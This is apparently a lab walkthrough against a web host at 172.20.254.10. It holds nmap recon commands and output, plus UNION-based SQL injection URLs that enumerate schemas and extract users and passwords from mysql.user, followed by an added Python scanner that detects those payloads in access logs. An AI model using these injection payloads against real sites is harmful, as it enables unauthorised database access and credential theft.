
nmap -sn 172.20.254.0/24 | grep "Nmap scan report for" | cut -d ' ' -f5
______________________________________________________________
RESULT
172.20.254.10

nmap -sC -sV -P0 -p"$(nmap -P0 -p- --min-rate=5000 -T5 172.20.254.10 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//g')" -A -T4 172.20.254.10 > tcp-full-ports.txt

________________________________________________________________________
Open the file from the previous scan
cat tcp-full-ports.txt

RESULT
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_ 2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
_______________________________________________________________________
25/tcp open smtp Sendmail 8.13.5/8.13.5
| smtp-commands: dmzweb.naat-nalak.com Hello [172.31.240.18], pleased to meet you,
ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY,
HELP
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT
DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS
2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation
send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send
email to Postmaster at your site. 2.0.0 End of HELP info
______________________________________________________________________
80/tcp open http Apache httpd 2.2.0 ((Fedora))
|_http-title: Naat-nalaK
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-server-header: Apache/2.2.0 (Fedora)
Service Info: Host: dmzweb.naat-nalak.com; OS: Unix

___________________________________________________________________________________
ALTERNATIVE APPLICATIONS

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://172.20.254.10/

nikto -h 172.20.254.10

NOTE: A server should only have the GET and POST methods enabled.

_______________________________________________________________________
MASTER TABLES

information_schema: NAMES OF THE DATABASES

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, 3, 4, 5 %23

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, schema_name, 4, 5 from information_schema.schemata %23

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, table_name, 4, 5 from information_schema.tables where table_schema= 'mysql' %23

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, table_name, 4, 5 from information_schema.tables where table_schema= 'mysql' and table_name= 'phpc_users' %23

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, column_name, 4, 5 from information_schema.columns where table_schema= 'mysql' and table_name='user' %23

172.20.254.10/index.html?page=blog&id=200 union select 1, 2, user, 4, Password from mysql.user %23
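An added defender-side example, not part of the original notes: a small Python scanner that flags the UNION / information_schema enumeration requests shown above in web-server access logs. The log lines, client addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (not the lab host's real logs); the
# 2nd-4th requests carry the UNION / information_schema payloads from the notes
# above. %23 is the URL-encoded '#' that comments out the rest of the SQL query.
SAMPLE_LOG = """\
172.31.240.18 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html?page=blog&id=200 HTTP/1.1" 200 5120
172.31.240.18 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html?page=blog&id=200%20union%20select%201,%202,%203,%204,%205%20%23 HTTP/1.1" 200 5310
172.31.240.18 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html?page=blog&id=200+union+select+1,+2,+schema_name,+4,+5+from+information_schema.schemata+%23 HTTP/1.1" 200 5400
172.31.240.18 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html?page=blog&id=200%20UnIoN/**/SeLeCt%201,2,user,4,Password%20from%20mysql.user%20%23 HTTP/1.1" 200 5600
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html?page=about HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Each rule is matched against the decoded, normalised parameter value.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\s*\.")),
    ("mysql.user", re.compile(r"\bmysql\s*\.\s*user\b")),
    ("sql-comment", re.compile(r"(?:#|--)\s*$")),
]

def normalize(value: str) -> str:
    """Lower-case, replace /**/ comments with spaces, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def scan_log(log_text: str) -> list:
    """Return one finding {line, client, param, rules} per suspicious value."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        # parse_qs percent-decodes values and turns '+' into spaces.
        query = urlsplit(match.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = [name for name, rx in RULES if rx.search(normalize(value))]
                if hits:
                    findings.append({"line": lineno, "client": client,
                                     "param": param, "rules": hits})
    return findings

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

Alert on the client address rather than on a single hit: the sequence of probes above (column count, schemata, tables, columns, mysql.user) from one source is the signature of the enumeration.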
